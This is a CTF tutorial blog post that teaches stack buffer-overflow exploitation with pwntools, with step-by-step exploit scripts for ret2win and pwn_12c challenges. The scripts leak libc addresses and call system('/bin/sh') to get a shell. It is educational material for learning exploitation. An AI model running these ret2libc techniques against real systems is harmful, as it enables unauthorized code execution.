How2BufferFlow
July 16th 2021
How 2 buffer(over)flow
A detailed step-by-step guide on how to exploit simple buffer overflows and more.
Examples will include these binaries:
- ret2win (Easy; basic buffer overflow)
- pwn_12c (Easy & Medium, 2 challs in one)
- ropncall (Medium; Ropping required)
- Librarian 3 (Hard; longer exploit)
And there's also some more information:
Structure of ELFs and some data gathering
This is a long explanation of what a cool little tool does for us automatically; to see the tool itself, just go to the next section.
So before we can actually exploit something, we need to see what we can use. For this, the readelf tool from binutils is a great choice.
If we run readelf -l <binary> on any of the binaries provided, we get a short summary of all the segments which are important when we start the program. There are different types, but for now all we care about are the "LOAD" segments. For each of them we can read the offset in the file (in bytes), the virtual address the segment should be loaded to, the size of the segment and which flags the segment will have once it's loaded.
The most important segments are the ones with an "E" in the flags, since those are the segments with the code. If there's a segment with "RWE", then nothing ensures that nobody can overwrite the code you're executing or that nobody executes data as code (generally W^X is enabled though, meaning a segment is either writable or executable but not both).
Another thing you might see is that the virtual address of the first segment is zero, the next one is just at the size of the first, the one after that is at the sum of the previous segments, etc. This indicates that the binary was compiled with the -fPIE (or equivalent) switch, which makes the binary loadable at any address, as long as everything stays at the same relative offsets (Position Independent Code). This makes exploitation considerably harder, since we don't know at which address the binary was loaded (Address Space Layout Randomization will put it at a random address).
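To make the flag reading a bit more concrete, here is a minimal sketch of how the flags column can be decoded. The bit values are the ones from the ELF specification; the function names and the example segment list are made up for illustration and are not taken from any of the challenge binaries.

```python
# Program header flag bits as defined by the ELF specification.
PF_X = 0x1  # execute
PF_W = 0x2  # write
PF_R = 0x4  # read


def flags_to_str(p_flags):
    """Render p_flags in the three-column style readelf uses, e.g. 'R E'."""
    return "".join(
        letter if p_flags & bit else " "
        for bit, letter in ((PF_R, "R"), (PF_W, "W"), (PF_X, "E"))
    )


def violates_wx(p_flags):
    """True if a segment is writable and executable at the same time."""
    return bool(p_flags & PF_W) and bool(p_flags & PF_X)


# Hypothetical LOAD segments as (virtual address, flags); not a real binary.
segments = [(0x400000, PF_R), (0x401000, PF_R | PF_X), (0x404000, PF_R | PF_W)]
for vaddr, flags in segments:
    print(hex(vaddr), flags_to_str(flags), "W^X violated" if violates_wx(flags) else "ok")
```

None of the three made-up segments is both writable and executable, so an overflow into data there cannot simply be jumped to.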
Intro to pwntools
Run pip install pwntools to get the pwn tools you need to exploit all the binaries (seriously, pwntools is great). Make sure you install it in such a way that the installed binaries are in your path (easiest to do if you install with root; if they're not in your path, pip will warn you about that after installing).
Now if you get a pwn challenge all you need to do is to run
pwn template --host remote --port port binary > exploit.py
and then you have a nice template to work with (you can leave out --host and --port if you don't have a remote; check the help page of pwn template for more information).
In the template you will also have a comment indicating some things we manually deciphered from readelf before: namely the PIE status and, if there's no PIE, the base address. It also tells you whether RELocation Read-Only (RELRO) is enabled, the state of the NX bit (No eXecute for data, which would be disabled if there's an RWX segment), and whether there's a stack canary. The stack canary is simply a random value placed on the stack between the local variables and the saved return address. It is set at the beginning of the function and checked before the function returns, so a buffer overflow that modified it on the way to the return address is detected.
Now you can run that template with some flags:
- GDB will start a gdb attached to the program
- LOCAL will launch it locally (the default is the server if you have specified a host and a port)
- DEBUG will print all the bytes that are sent and received
- NOASLR will (try to) disable ASLR and make the addresses predictable
There are some more, but these are the most important ones.
Now let's look at what we need to do in the code to interact with the binary. There should be a short example of what you can do. All the interactions with the binary will be done with the io object. To log you can use info("x is: 0x%x", number) or debug with the same printf-like syntax (or just use print, I don't care).
The io object is a "Tube", which just means that it's a wrapper around the binary such that no matter how you execute it, the interaction will be the same. There are a few interaction methods implemented: via sockets (remote), subprocesses (local) and some more obscure ones like SSH and Serial. But in all cases, after getting the io object, the functions will be the same.
Sending
To send you can simply do io.send(data), or io.sendline(data) if you want to have the newline appended automatically.
Receiving
To read you can do io.recv(num) for up to a specific number of bytes (io.recvn(num) if you need exactly that many), io.recvline() to read a line, or io.recvuntil("waiting_for"), which will wait until the binary prints "waiting_for" (for the latter, both bytes and strings are accepted).
Interacting
Once you got a shell, or if you simply want to play with the binary, you can call io.interactive(), which will hand the io over to your stdin/stdout for you to interact with.
Packing / Unpacking ints
To send 32 or 64 bit integers as raw bytes you have the methods p32 and p64; to convert a set of 4 or 8 bytes back into a 32 or 64 bit integer you have u32 and u64. Make sure the buffers are the correct lengths when unpacking.
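If you want to see what these helpers do under the hood, here is a rough stdlib equivalent. It assumes little-endian byte order (the default for x86 targets) and reuses the pwntools names only for readability; these are stand-ins, not the pwntools implementation.

```python
import struct


def p32(value):
    """Pack an unsigned 32-bit integer into 4 little-endian bytes."""
    return struct.pack("<I", value)


def p64(value):
    """Pack an unsigned 64-bit integer into 8 little-endian bytes."""
    return struct.pack("<Q", value)


def u32(data):
    """Unpack exactly 4 little-endian bytes into an integer."""
    return struct.unpack("<I", data)[0]


def u64(data):
    """Unpack exactly 8 little-endian bytes into an integer."""
    return struct.unpack("<Q", data)[0]


print(p32(0x1337c0d3))   # the least significant byte comes first
print(hex(u32(b"naaa")))
```

struct.unpack raises an error if the buffer is not exactly 4 (or 8) bytes long, which is the same reason you have to watch the lengths with u32 and u64.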
cyclic
There's a neat little function called cyclic: it takes an integer parameter and spits out that many bytes of a pattern in which every sequence of four consecutive bytes is unique. If you have four bytes of that pattern, you can identify at what position those bytes were with the function cyclic_find("...."), which is especially useful for buffer overflows and detecting how many bytes you have to overflow (I mean, you can always just calculate it from the stack pointer in the disassembly, up to you).
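For the curious, a pattern like this can be generated with the standard de Bruijn sequence construction. The sketch below uses the lowercase alphabet and 4-byte windows, which to my understanding are also the pwntools defaults; the _sketch names are made up so they don't get confused with the real functions.

```python
from itertools import islice


def de_bruijn(alphabet, n):
    """Yield the bytes of a de Bruijn sequence over alphabet with window size n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic_sketch(length, alphabet=b"abcdefghijklmnopqrstuvwxyz", n=4):
    """Return the first length bytes of the pattern."""
    return bytes(islice(de_bruijn(alphabet, n), length))


def cyclic_find_sketch(chunk, limit=4096):
    """Return the offset of a 4-byte chunk within the first limit pattern bytes."""
    return cyclic_sketch(limit).find(chunk)


print(cyclic_sketch(12))
print(cyclic_find_sketch(b"jaaa"))
```

Since every 4-byte window appears only once, whatever four bytes end up in the instruction pointer identify exactly one offset.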
fit
fit is another cool function which takes a dictionary and makes the values fit at the position given by the key, so for the dict {0: "123", 6: "456", 12: "1111111"}, fit will produce b'123aba456aaa1111111'. The spaces where there's nothing are filled with the same pattern as cyclic produces. Inputs are either strings or byte objects, but the output is always a byte object.
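Here is a small sketch of that behaviour, reproducing the example above. It is a simplification: the filler helper only knows the first 100 bytes of the pattern (where it is simply "aaaa", "baaa", "caaa", ...), it only accepts bytes, and both function names are invented for this example.

```python
def filler(length):
    """First length bytes of the cyclic-style pattern (simplified, max 100)."""
    if length > 100:
        raise ValueError("this simplified filler only covers the first 100 bytes")
    chunks = (bytes([ord("a") + i]) + b"aaa" for i in range(25))
    return b"".join(chunks)[:length]


def fit_sketch(pieces):
    """Place each value at its offset and pad the gaps with pattern bytes."""
    out = bytearray()
    for offset, data in sorted(pieces.items()):
        if offset < len(out):
            raise ValueError("pieces overlap at offset %d" % offset)
        # Each gap byte is the pattern byte belonging to its own position.
        out += filler(offset)[len(out):]
        out += data
    return bytes(out)


print(fit_sketch({0: b"123", 6: b"456", 12: b"1111111"}))
```

Because the padding bytes keep their pattern positions, a crash caused by a badly placed value can still be looked up with cyclic_find.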
shellcraft & rop
Useful for shellcoding and ropping, but I'll be doing everything manually in this guide, since we're here to learn how2bufferflow, not how to use pwntools (but seriously, you should look into them too, they make ropping easier).
The exe object
The template automatically made an object exe for you; with this you can access symbols, the got and the plt very easily. Even if the binary has no symbols, if it is dynamically linked, then the got and plt will contain functions with names (since they are often dynamically loaded).
To get the offset/address of a symbol you can do exe.sym["name"]; for example, if you want the address of the main function you can do exe.sym["main"]. Alternatively you can do exe.sym.main if you like that syntax more.
The same can be done with the plt/got tables. Just do exe.got["puts"] to get the address for puts in the got and exe.plt["puts"] to get the address/offset of puts in the plt.
To get the address to the start of the bss you can do exe.bss()
Now that I told you how to get those values, what are they for? Well, the Procedure Linkage Table contains small stubs that lazily resolve library functions (meaning the address of a function is only looked up when you call it for the first time). If the function has already been resolved, then the Global Offset Table holds the pointer to the function and the plt stub just jumps to that pointer. The bss is just uninitialized data, so it lives in a read/write segment, and in programming languages this contains globals / static variables which are accessible over the entire program but which are not malloced.
So if you want to call a function from a library, you do that over the plt, if you want the pointer of a library function you look in the got (Useful for leaking libc addresses :P)
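As a mental model only (this is a toy, not how the dynamic linker is implemented), lazy binding can be pictured like this. The ToyProcess class and its members are invented for this illustration.

```python
class ToyProcess:
    """Toy model: a GOT that is filled in lazily by PLT-style calls."""

    def __init__(self, libc):
        self.libc = libc          # name -> the "real" library function
        self.got = {}             # name -> resolved pointer (missing = unresolved)
        self.resolver_calls = 0   # how often the slow lookup had to run

    def _resolve(self, name):
        self.resolver_calls += 1
        self.got[name] = self.libc[name]

    def plt(self, name, *args):
        """Call through the PLT: resolve on first use, then jump via the GOT."""
        if name not in self.got:
            self._resolve(name)
        return self.got[name](*args)


proc = ToyProcess({"puts": len})   # len stands in for a libc function
print("puts" in proc.got)          # unresolved before the first call
proc.plt("puts", "hello")
proc.plt("puts", "again")
print("puts" in proc.got, proc.resolver_calls)
```

The takeaway for exploitation: a GOT entry only holds a libc pointer worth leaking once the function has been called at least once.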
The first bufferflow [ret2win]
First things first, open the file in any disassembler/decompiler (Doesn't really matter if you use ghidra, ida, binary ninja, cutter, ...) You just have to find the main() function (be aware, binary ninja optimizes stuff out here!) You should get something like this: (Ghidra output of main)
undefined8 main(void)
{
    undefined local_24 [12];
    undefined local_18 [12];
    uint local_c;

    setvbuf(stdout,(char *)0x0,2,0);
    setvbuf(stdin,(char *)0x0,2,0);
    local_c = 0xdeadbeef;
    puts("Casual stroll wont do, step somewhere specific");
    __isoc99_scanf("%20s",local_18);
    if (local_c == 0x1337c0d3) {
        puts("Check");
        __isoc99_scanf("%44s",local_24);
    }
    return 0;
}
So we see that we first read up to 20 chars into local_18, and if another variable (local_c, which sits right after local_18) has a certain value, we do another read with more characters. If you just try to input 20 characters into the binary you'll see that it just exits, so first we need to make sure we can get it to crash (by overwriting the return address). To get there, we first need to overwrite the value in local_c, so we do
io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.interactive()
and voilà, we get into the if statement. Why we chose 12 should be clear from the stack layout (local_c is directly after local_18, the size of which is 12, so we just overflow it).
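The first stage can be modelled with a tiny simulation of the two variables. It assumes local_c sits directly after the 12 bytes of local_18, as the Ghidra names suggest, and it only models these 16 bytes of the frame; the function name is made up.

```python
import struct


def first_read(payload):
    """Simulate scanf("%20s", local_18) and return the resulting local_c."""
    frame = bytearray(16)                         # local_18[12] then local_c
    frame[12:16] = struct.pack("<I", 0xDEADBEEF)  # local_c = 0xdeadbeef
    data = payload[:20] + b"\x00"                 # at most 20 chars plus the NUL
    data = data[:len(frame)]                      # bytes beyond local_c are ignored here
    frame[:len(data)] = data
    return struct.unpack_from("<I", frame, 12)[0]


payload = b"A" * 12 + struct.pack("<I", 0x1337C0D3)
print(hex(first_read(payload)))     # the value the if statement checks
print(hex(first_read(b"A" * 12)))   # only the terminating NUL reaches local_c
```

The second call shows a detail that is easy to miss: even exactly 12 characters already clobber the lowest byte of local_c, because scanf appends a terminating NUL.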
Next we want to figure out if we crash, so we extend the exploit to this:
io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.recvuntil("Check")
io.sendline(cyclic(44)) # we read 44 chars in the second scanf
io.interactive()
and sure enough we get a SIGSEGV, so time to add GDB to the parameters and investigate. If you don't have any extensions installed in gdb to help you with debugging, I can suggest gdb-peda, pwndbg or gef.
If you get an error that you need to set "terminal", then you need to first start tmux (such that the script can multiplex the output and gdb in the same terminal window). If you don't like the split into top and bottom, but would rather have left and right, then just add
context.terminal = ["tmux", "split", "-h"]
to your exploit script (before calling io=start()).
Next, just enter c into gdb to continue execution and wait for it to trigger the segfault. It should stop at a ret instruction and you should see the return address on the stack, which should be "jaaakaaa" if you read it as a string.
Now we just have to find the offset at which we need to write the return address we want. Lucky us, there is cyclic_find: open an interactive python shell, run from pwn import * and do cyclic_find("jaaa") to get the offset of 36. The challenge name indicates that we should return to the function called "win", so let's just do that. We know that there's no PIE (thanks pwntools), so all addresses are fixed, and we can just take the address of the win function from the symbols of the file.
So we update our exploit like this:
io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.recvuntil("Check")
io.sendline(fit({36: p64(exe.sym.win) }))
io.interactive()
The fit function will build our payload such that the 64-bit return address ends up at offset 36. And we're done and get the flag :)
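Two things are worth checking about that final payload: it has to fit into the 44 characters the second scanf accepts, and %s stops reading at the first whitespace byte, so the address must not contain one. The sketch below checks both; WIN_ADDR is a made-up placeholder (use exe.sym.win for the real value) and the helper names are invented.

```python
import struct

WIN_ADDR = 0x401196  # hypothetical placeholder, not the real address of win

# Bytes that scanf's %s treats as whitespace and therefore stops at.
SCANF_WHITESPACE = b" \t\n\v\f\r"


def build_payload(win_addr, offset=36):
    """Padding up to the return address, followed by the 64-bit address."""
    return b"A" * offset + struct.pack("<Q", win_addr)


def survives_scanf(payload, width):
    """True if %<width>s would read the whole payload in one go."""
    fits = len(payload) <= width
    clean = not any(byte in SCANF_WHITESPACE for byte in payload)
    return fits and clean


payload = build_payload(WIN_ADDR)
print(len(payload), survives_scanf(payload, 44))
```

The NUL bytes in the upper half of the address are not a problem here, since as far as I know %s only stops at whitespace, not at zero bytes.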
The second bufferflow [pwn_12c easy part]
Well, template and ghidra go brrrr. Again the goal is to call the win function, this time we have to pass some arguments too though. Luckily this time we have a gets, which means we're not limited by character counts.
So first we need to determine the length of stack variables
io = start()
io.sendline(cyclic(100)) # should well overflow anything
io.interactive()
Again, start with GDB and continue until you get the segfault, then look at the top of the stack (or the current EIP/RIP value if it tried to jump there) and search for the offset of the first four characters in the cyclic pattern. In our case it jumped to the address before realizing that there's nothing there. So in EIP we have 0x6161616e, and peda kindly tells us that this is "naaa". Thus our offset is 52.
An alternative to this dynamic approach would be to compute the offset based on the RBP/EBP inside the function. In this example, if we look at the disassembly we see that it does
08049273 8d 45 d0 LEA EAX=>local_34,[EBP + -0x30]
to load the address of the buffer for the gets call. The buffer starts 0x30 bytes below EBP, EBP points to the saved old EBP (4 bytes), and the return address comes right after that. So the return address is at offset 0x30 + 4 = 0x34 == 52 from the start of the buffer.
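Spelled out as arithmetic (the function name is just for illustration):

```python
def offset_to_return_address(buffer_below_frame_pointer, pointer_size):
    """Distance from the start of the buffer to the saved return address.

    The buffer starts buffer_below_frame_pointer bytes below EBP/RBP, then
    comes the saved frame pointer, then the return address.
    """
    return buffer_below_frame_pointer + pointer_size


# Values from the LEA above: buffer at EBP - 0x30, 32-bit binary.
print(offset_to_return_address(0x30, 4))
```

This matches both the 52 found with cyclic and the 0x34 in Ghidra's local_34 name.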
So now let's debug it with this exploit (launch with GDB and set a breakpoint in win by typing break win before doing c):
io = start()
payload = p32(exe.sym.win) + cyclic(20)
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.interactive()
Once there, single step (by doing ni) to the first compare. There we can inspect the value of the first argument by doing x/wx $ebp+8, which win expects to be 0xdeadbeef. Instead we see that it is 0x61616162. Interesting, let's continue with the second parameter at $ebp+12, and we see that it's 0x61616163. So the arguments are simply taken from the stack after the return address we overwrote, skipping another four bytes (which win treats as its own return address; this holds for 32-bit programs at least). So let's just put that into our payload:
io = start()
payload = p32(exe.sym.win) + b"aaaa" + p32(0xdeadbeef) + p32(0xba5eba11) + p32(0x1337c0de)
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.interactive()
and we pass all the checks, hooray, 1/2 done with this challenge.
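To see why the arguments land where they do, here is a small model of what a 32-bit function sees after we "return" into it. After its prologue, EBP points at the slot that held our overwritten return address, so [ebp+4] is its own return address and [ebp+8] is the first argument. WIN_ADDR is a made-up placeholder and the function name is invented.

```python
import struct

WIN_ADDR = 0x080491B6  # hypothetical placeholder, use exe.sym.win in the exploit


def args_seen_by_callee(payload, count):
    """Return the first count stack arguments the function we return into sees.

    payload is everything we write starting at the overwritten return address:
    payload[0:4] = address we return to, payload[4:8] = its return address,
    payload[8:]  = its arguments (cdecl, 4 bytes each).
    """
    return [struct.unpack_from("<I", payload, 8 + 4 * i)[0] for i in range(count)]


probe = struct.pack("<I", WIN_ADDR) + b"aaaabaaacaaadaaaeaaa"
print([hex(a) for a in args_seen_by_callee(probe, 2)])

final = struct.pack("<IIII", WIN_ADDR, 0x61616161, 0xDEADBEEF, 0xBA5EBA11)
final += struct.pack("<I", 0x1337C0DE)
print([hex(a) for a in args_seen_by_callee(final, 3)])
```

The first print reproduces the 0x61616162 and 0x61616163 we saw in gdb, the second one shows the three values win checks.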
The shell exploit [pwn_12c medium part]
This time we need to exploit the same binary as before, but we need to get a shell, so launch "/bin/sh" or a similar program. We already know the correct offset, so we just need to adjust our payload to do the correct thing. We can trivially call system by going through its entry in the .plt section. The hard part is to get a string "/bin/sh" into the program and then a pointer to it onto the stack (since that's what we want system to execute). First I'll show the intended version, since that's harder than my solution. For that we first need to leak a libc address, because there are "/bin/sh" strings in libc, but at different addresses for each version. As I said, to call a function we call it in the plt, and to get its address we look into the got. So to leak an address from libc we can simply call the libc function puts, which the program already uses (thus the resolved address is certainly in the got), and pass it a got address.
io = start()
payload = p32(exe.plt.puts) + b"aaaa" + p32(exe.got.puts)
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.recvuntil("flag!\n")
x = u32(io.recv(4))
info("Got puts address: %x", x)
io.interactive()
With this we can leak a single address, but to know which version of libc the remote has, we need more. Luckily there are 4 bytes of return address left which are not an argument, so we can interleave two calls to puts with different got entries: the first puts returns into the second one.
io = start()
payload = p32(exe.plt.puts) + p32(exe.plt.puts) + p32(exe.got.puts) + p32(exe.got.gets)
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.recvuntil("flag!\n")
x = u32(io.recv(4))
info("Got puts address: %x", x)
io.recvline() # clear the line from the puts
x = u32(io.recv(4))
info("Got gets address: %x", x)
io.recvline()
io.interactive()
Make sure you use functions which are already resolved in the got (aka they were called at least once). Once you have two function addresses, you can use the libc db to find out which version of libc the remote server is running. The website even has useful exploitation information, like str_bin_sh 0x195b84, which means for us that there's a "/bin/sh" at offset 0x195b84 in libc.
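Why do two leaked addresses help even though ASLR moves libc around? The base address is page aligned, so the lowest 12 bits of every leaked address equal the lowest 12 bits of the symbol's offset inside libc, and as far as I know that is what such databases match on. A sketch with made-up numbers (only the puts offset 0x714c0 appears in this guide; the leaked values and the gets offset are invented):

```python
PAGE_MASK = 0xFFF  # libc is mapped at a page-aligned address


def matches_candidate(leaks, candidate_offsets):
    """True if every leaked address agrees with the candidate libc's offsets."""
    return all(
        (address & PAGE_MASK) == (candidate_offsets[name] & PAGE_MASK)
        for name, address in leaks.items()
    )


# Hypothetical leaks and candidate symbol tables, for illustration only.
leaks = {"puts": 0xF7E1A4C0, "gets": 0xF7E19A50}
candidate_a = {"puts": 0x714C0, "gets": 0x70A50}
candidate_b = {"puts": 0x67360, "gets": 0x66770}

print(matches_candidate(leaks, candidate_a))
print(matches_candidate(leaks, candidate_b))
```

One symbol alone usually leaves many candidates; each additional leaked function narrows the list down further.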
Now our final exploit can finally begin to take form. First we need to leak a single address from libc, but then we need to send input a second time in order to pass the address of the /bin/sh string, computed with the correct libc base address. This is easily done by just calling the "run" function again and doing the exploit again. So first we leak the libc address like earlier, but return to run() instead of segfaulting:
io = start()
payload = p32(exe.plt.puts) + p32(exe.sym.run) + p32(exe.got.puts)
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.recvuntil("flag!\n")
x = u32(io.recv(4))
info("Got puts address: %x", x)
io.interactive()
Now we have a leaked libc address and the offset of a /bin/sh string, so let's just combine them right away:
io = start()
payload = p32(exe.plt.puts) + p32(exe.sym.run) + p32(exe.got.puts)
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.recvuntil("flag!\n")
x = u32(io.recv(4))
info("Got puts address: %x", x)
payload = p32(exe.plt.system) + b"aaaa" + p32(x + 0x195b84 - 0x714c0) # /bin/sh string inside libc => param for system()
io.sendline(fit({52:payload})) # second overflow through run(), same offset
io.interactive()
The offsets 0x714c0 and 0x195b84 are both taken straight from libc.rip: we subtract the offset of puts (0x714c0) from the leaked puts address to get the base address and then add the str_bin_sh offset to get the string address. And that's it, we got a shell (at least I get one on my machine, since those offsets are for my libc; they will most likely differ for your system!).
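The address arithmetic from the last payload, written out step by step. The two offsets are the ones from this guide (so they only fit that one libc build); the leaked address in the example is made up, and the function names are invented.

```python
PUTS_OFFSET = 0x714C0         # offset of puts in the author's libc
STR_BIN_SH_OFFSET = 0x195B84  # offset of "/bin/sh" in the same libc


def libc_base(leaked_puts):
    """Compute the libc base from a leaked puts address, with a sanity check."""
    base = leaked_puts - PUTS_OFFSET
    if base & 0xFFF:
        # A base that is not page aligned means the offsets belong to another libc.
        raise ValueError("base %#x is not page aligned, wrong libc?" % base)
    return base


def bin_sh_address(leaked_puts):
    """Address of the "/bin/sh" string to pass to system()."""
    return libc_base(leaked_puts) + STR_BIN_SH_OFFSET


leaked = 0xF7E1A4C0  # hypothetical leak, your value will differ on every run
print(hex(libc_base(leaked)), hex(bin_sh_address(leaked)))
```

The alignment check is cheap and catches the most common mistake, which is using offsets from a libc version that does not match the target.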